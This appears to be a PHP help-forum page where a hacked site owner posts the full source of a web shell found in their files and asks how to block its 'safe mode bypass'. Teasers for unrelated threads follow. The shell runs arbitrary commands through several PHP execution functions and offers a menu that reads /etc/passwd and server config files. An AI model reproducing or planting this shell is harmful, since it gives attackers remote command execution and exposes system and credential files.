I got hacked and the following code was placed within my files:
Code: [Select]<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?
Production of mango in processing industry
Hi,
RSS feed - FeedList for WordPress
Hi,I'm trying to alter the FeedList plugin for WordPress so that I can click on the title of an item and have it open in a new window to display the full item. I don't want it to go to the host
Install page
How do I make it so when a user submits information on the Install page, it'll right it into the correct file. I can do the forms and $_POST, but I need it so that it actually works.Current stuff in
PHP If Else statement for breadcrumb
HiI am trying to use a PHP if else statement to display a breadcrumb link on wordpressThe codeLine number On/Off | Expand/Contract <div class="triple silhouette_break">
Windows 7
Windows 7 default user account control worries experts. Corporate IT departments should be pleased with new security measures in Windows 7, but consumers are still at risk of getting hit by malware
displaying unknown amount of results
I am reading a directory and getting a list of folders in the directory, I want to display the folders in a table which is 6 columns of results across by how ever may rows, here is the code I am using
Help a newbee save my job !
Hey guys i am dying here i am new to php and would like for someone to help me with this problemi have a script that send information from a "form" but the probelm is that i need this to be
Limiting uploaded file type
Hi. First post here I am working on a simple upload script, and I need it to limit the allowed file type that is uploaded to only .mpr files. .mpr files are not a MIME file type so I do not know how
Insert numbers from Barcode scanner into online php page
I have a real big problem, Here is what I'm trying to do. I have a Intermec CN3 handheld computer that has a builtin scanner. We have built a website that manage our inventory. How? We have a simple
Table trouble
i have been reading the forum for a few weeks and decided to join. i like the format and the advice given is great. anywho here is my table, the issue i have is that i am displaying pictures from